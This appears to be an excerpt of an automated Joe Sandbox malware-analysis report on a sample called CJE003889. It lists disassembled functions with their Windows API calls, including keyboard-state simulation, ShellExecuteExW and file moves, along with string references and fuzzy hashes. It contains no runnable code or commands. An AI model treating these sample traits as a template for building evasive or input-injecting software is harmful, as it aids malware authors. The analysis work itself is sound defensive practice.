LoadIconW.USER32(00000000,00007F03), ref: 00CC3033

Strings

warning, xrefs: 00CC301C
info, xrefs: 00CC2FD4
stop, xrefs: 00CC3004
blank, xrefs: 00CC2FB5
question, xrefs: 00CC2FEC

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 45718a608810668a7f9ff4ee90354795b1ae41c3698c5eacffc25d6f0dcab460
Instruction ID: 969b4f6e38d04a223a9cdbfd435ce71406de5e7da32f0f17514927ef83710f84
Opcode Fuzzy Hash: 45718a608810668a7f9ff4ee90354795b1ae41c3698c5eacffc25d6f0dcab460
Instruction Fuzzy Hash: C4112B327483C6BEE7249A55FC82EAB7B9CDF15324B20406EF900AA1C1DF705F4466B8

Function 00CC42F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CC4312
LoadStringW.USER32(00000000), ref: 00CC4319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CC432F
LoadStringW.USER32(00000000), ref: 00CC4336
_wprintf.LIBCMT ref: 00CC435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CC437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00CC4357

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: d155d45094fd2f63c2cd5cb540e105eee241fed4661e07a2c4c70d108671c1da
Instruction ID: cefa2557d2c09f44305e639b554f11559df945555ae698fda987545f40148a13
Opcode Fuzzy Hash: d155d45094fd2f63c2cd5cb540e105eee241fed4661e07a2c4c70d108671c1da
Instruction Fuzzy Hash: DA014FF2900248BFE711A7A0DD89FEA776CEB08700F0045A9BB45E6051EA749E864B74

Function 00CED43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C62612: GetWindowLongW.USER32(?,000000EB), ref: 00C62623

GetSystemMetrics.USER32(0000000F), ref: 00CED47C
GetSystemMetrics.USER32(0000000F), ref: 00CED49C
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CED6D7
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CED6F5
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CED716
ShowWindow.USER32(00000003,00000000), ref: 00CED735
InvalidateRect.USER32(?,00000000,00000001), ref: 00CED75A
DefDlgProcW.USER32(?,00000005,?,?), ref: 00CED77D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 9ea40798d011478cfb84d22c0fd43acb5833b006194f164f278c8b6e50a0a2b8
Instruction ID: a9eed20a0a4e2c0d7108bd4984d2ed5f28c0cbc465407e1f6844a65f8ee0ff23
Opcode Fuzzy Hash: 9ea40798d011478cfb84d22c0fd43acb5833b006194f164f278c8b6e50a0a2b8
Instruction Fuzzy Hash: 79B18B75500295EBDF14CF6AC9C57AD7BB1BF04701F048069FC5A9F299D734AA90CB60

Function 00C62A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C62ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00C62B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C9C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C9C1C7,00000004,00000000,00000000,00000000), ref: 00C9C286

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 9ea4ffd1343bda85ab73d2ae19639846f8c90cac6fac66f41bb6c906a1bdd6d6
Instruction ID: 952772db6c1148ee60fb61e90d2fd711f68278a620eae1171166ee39a99433b7
Opcode Fuzzy Hash: 9ea4ffd1343bda85ab73d2ae19639846f8c90cac6fac66f41bb6c906a1bdd6d6
Instruction Fuzzy Hash: EA41EB31608FC09BDB359B699CCCB7B7B95AB85310F14891DF0A786562C6B19A43F720

Function 00CC70C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00CC70DD

Part of subcall function 00C80DB6: std::exception::exception.LIBCMT ref: 00C80DEC
Part of subcall function 00C80DB6: __CxxThrowException@8.LIBCMT ref: 00C80E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CC7114
EnterCriticalSection.KERNEL32(?), ref: 00CC7130
_memmove.LIBCMT ref: 00CC717E
_memmove.LIBCMT ref: 00CC719B
LeaveCriticalSection.KERNEL32(?), ref: 00CC71AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CC71BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC71DE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 8c67f2ad687c1f94365f11a79b180b88438772263ea1a86a3206b86cc253d9b7
Instruction ID: 877490f2aa49fc55091f0f68b29ab3bf5982655a64997b7f3dbb209b7c656ebf
Opcode Fuzzy Hash: 8c67f2ad687c1f94365f11a79b180b88438772263ea1a86a3206b86cc253d9b7
Instruction Fuzzy Hash: 31315B31900205EBCF40EFA4DC85AAFB7B8EF45710F2481A9F904AB256DB309E15DBA4

Function 00CE61D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00CE61EB
GetDC.USER32(00000000), ref: 00CE61F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CE61FE
ReleaseDC.USER32(00000000,00000000), ref: 00CE620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CE6246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CE6257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CE902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00CE6291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CE62B1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4e7d0e3f886a5763725031ce0738ac187c158614644fc323cb2424c6586c0685
Instruction ID: 5f5ac5716de660f6a766ba229143f19bf5e80390b78fda76a2a44bfd23bf1e9a
Opcode Fuzzy Hash: 4e7d0e3f886a5763725031ce0738ac187c158614644fc323cb2424c6586c0685
Instruction Fuzzy Hash: F6316B72201254BFEF118F61CC8AFEA3BADEF59765F044069FE089E291C6759D42CB60

Function 00CBBBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00CBBBC4
_memcmp.LIBCMT ref: 00CBBBE6
_memcmp.LIBCMT ref: 00CBBBFE
_memcmp.LIBCMT ref: 00CBBC11
_memcmp.LIBCMT ref: 00CBBC2B
_memcmp.LIBCMT ref: 00CBBC3E
_memcmp.LIBCMT ref: 00CBBC56
_memcmp.LIBCMT ref: 00CBBC71

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 8c6c8e13b9c39e137716d1ce01c16c1a9f28b8f8fabf2de0a4b488dc4ea2ffff
Instruction ID: 9e15d53d244c3ce9a4b389724148caa18d763e7cc42ce1edc0a8de6d3e687e1b
Opcode Fuzzy Hash: 8c6c8e13b9c39e137716d1ce01c16c1a9f28b8f8fabf2de0a4b488dc4ea2ffff
Instruction Fuzzy Hash: 1A21D5726026297BE604B7129D42FFF7B9D9E5038CF084020FE0596747EBA4DF12D2A6

Function 00CCEB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9

_wcstok.LIBCMT ref: 00CCEC94
_wcscpy.LIBCMT ref: 00CCED23
_memset.LIBCMT ref: 00CCED56

Strings

X, xrefs: 00CCED93

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 7b8845d3c5c049368ac9c4896eb543f18f413be60bae0fde8c68308451695c80
Instruction ID: cfc466ae3071909c1b04b914d720fee8c67d95aa3fc53a69fcac06887e3673b2
Opcode Fuzzy Hash: 7b8845d3c5c049368ac9c4896eb543f18f413be60bae0fde8c68308451695c80
Instruction Fuzzy Hash: 1CC18A716083419FC764EF64C881E6AB7E4FF85314F10492DF89A9B2A2DB30ED45DB82

Function 00C61424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10977a263c0454e52a0ea5ba039d1a8b7f840311ea368d955d260bca231e3372
Instruction ID: 2d8905e7a2e5101d0e40a2ea57a02660be6a883adbbc0d783f11866d948329d1
Opcode Fuzzy Hash: 10977a263c0454e52a0ea5ba039d1a8b7f840311ea368d955d260bca231e3372
Instruction Fuzzy Hash: 38716C30900109FFDB24CF99CC89ABEBBB9FF85311F188159F915AB251C734AA51DBA0

Function 00CD6B76 Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e342951b76ffb766265591deccbd85177c6cfea529ff3e7b79cf6326bf1c5785
Instruction ID: a99ea2f63c5a5f4aaa92a9840411264e58b61cad538ae336d4a4ec691adf715b
Opcode Fuzzy Hash: e342951b76ffb766265591deccbd85177c6cfea529ff3e7b79cf6326bf1c5785
Instruction Fuzzy Hash: 4861AF71208300ABC720EB64DC81F6FB7E9EF94714F104A1EF6559B292DB70AD05DB52

Function 00CEB351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00F96388), ref: 00CEB3EB
IsWindowEnabled.USER32(00F96388), ref: 00CEB3F7
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CEB4DB
SendMessageW.USER32(00F96388,000000B0,?,?), ref: 00CEB512
IsDlgButtonChecked.USER32(?,?), ref: 00CEB54F
GetWindowLongW.USER32(00F96388,000000EC), ref: 00CEB571
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CEB589

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: b1344db24f2ed037d942933efb2d701d895cc4e2189bb6cf579e0d7504b7c1a3
Instruction ID: 25e3a7f68cf926ec75d7fba107c71e7a61b54d5bbf202899b3d6173348f61b98
Opcode Fuzzy Hash: b1344db24f2ed037d942933efb2d701d895cc4e2189bb6cf579e0d7504b7c1a3
Instruction Fuzzy Hash: 8771AD34600684AFDB219F66D8D1FBBBBB9EF09300F144069F965973A2C731AE41DB60

Function 00CDF41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CDF448
_memset.LIBCMT ref: 00CDF511
ShellExecuteExW.SHELL32(?), ref: 00CDF556

Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC

Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9

GetProcessId.KERNEL32(00000000), ref: 00CDF5CD
CloseHandle.KERNEL32(00000000), ref: 00CDF5FC

Strings

@, xrefs: 00CDF525

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: c3b57ad952fa90f3b6a416d50b752e5f7f84ef71c050eea451e9e66b71900c25
Instruction ID: 39d443f9651062cc4225985565b277b8bd91cc011e36f2e97e60f3abd47f3570
Opcode Fuzzy Hash: c3b57ad952fa90f3b6a416d50b752e5f7f84ef71c050eea451e9e66b71900c25
Instruction Fuzzy Hash: 8A619175A00619DFCB15EF94C4819AEBBF5FF48314F14806EE956AB391CB30AE42DB90

Function 00CC0F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00CC0F8C
GetKeyboardState.USER32(?), ref: 00CC0FA1
SetKeyboardState.USER32(?), ref: 00CC1002
PostMessageW.USER32(?,00000101,00000010,?), ref: 00CC1030
PostMessageW.USER32(?,00000101,00000011,?), ref: 00CC104F
PostMessageW.USER32(?,00000101,00000012,?), ref: 00CC1095
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CC10B8

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6de1ad83a07f2eeace67ef1453fd7e164a91053dfd1a754a0b87292070d97252
Instruction ID: cbec3a6f1a5a782e7776aec85dc824a589853d6fa413ae1dd6302463236b4d03
Opcode Fuzzy Hash: 6de1ad83a07f2eeace67ef1453fd7e164a91053dfd1a754a0b87292070d97252
Instruction Fuzzy Hash: 0851EFA09046D57DFB324275CC55FBABEA95B07300F0C858DE5E4868C3C398AEC9D751

Function 00CC0D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00CC0DA5
GetKeyboardState.USER32(?), ref: 00CC0DBA
SetKeyboardState.USER32(?), ref: 00CC0E1B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CC0E47
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CC0E64
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CC0EA8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CC0EC9

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 22f0c40e91f367020372d3c693986ff3b3da8c0e74e756d451eade0702616f5f
Instruction ID: bfb9d8ec546504f7d8ccc7f6148f2db04cf84ed8867b39c0ef26b4d9b7b81a88
Opcode Fuzzy Hash: 22f0c40e91f367020372d3c693986ff3b3da8c0e74e756d451eade0702616f5f
Instruction Fuzzy Hash: 5551E6A09447D5BDFB324374CC55F7A7FA95B06300F18888DE1E5868C3C795AE94E760

Function 00CC55FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00CC560A
_wcsncpy.LIBCMT ref: 00CC563F
_wcsncpy.LIBCMT ref: 00CC5671
_wcsncpy.LIBCMT ref: 00CC56A4
_wcsncpy.LIBCMT ref: 00CC56E6
_wcsncpy.LIBCMT ref: 00CC5720
_wcsncpy.LIBCMT ref: 00CC574F

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 1cc7d34204fe4c8c17f94e874f7db36fa46e4de7596e8f6b78eb088bfe010620
Instruction ID: 94c4c160fbc6457d26da70cb3f097a46939cc2147ca1827a5889452167f38f0e
Opcode Fuzzy Hash: 1cc7d34204fe4c8c17f94e874f7db36fa46e4de7596e8f6b78eb088bfe010620
Instruction Fuzzy Hash: 0B41A375C1161476CB11FBB4CC8AACFB3B89F04310F50895AF919E3221EB34A785D7AA

Function 00CC3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CC3697,?), ref: 00CC468B

Part of subcall function 00CC466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CC3697,?), ref: 00CC46A4

lstrcmpiW.KERNEL32(?,?), ref: 00CC36B7
_wcscmp.LIBCMT ref: 00CC36D3
MoveFileW.KERNEL32(?,?), ref: 00CC36EB
_wcscat.LIBCMT ref: 00CC3733
SHFileOperationW.SHELL32(?), ref: 00CC379F

Strings

\*.*, xrefs: 00CC372D

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: a3460a6eb4670bb225f5e4c2f0f85704872f23e9469dbf7fa68d6b06e51d8ebd
Instruction ID: a58feb893b33a412e97e30864db734ecd1769273156c71bfa1a4546e111e7b4d
Opcode Fuzzy Hash: a3460a6eb4670bb225f5e4c2f0f85704872f23e9469dbf7fa68d6b06e51d8ebd
Instruction Fuzzy Hash: 34417CB1108384AAC755EF64D895FDFB7E8AF88380F00482EF49AC3251EA34D7899756

Function 00CE7291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CE72AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CE7351
IsMenu.USER32(?), ref: 00CE7369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CE73B1
DrawMenuBar.USER32 ref: 00CE73C4

Strings

0, xrefs: 00CE729E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
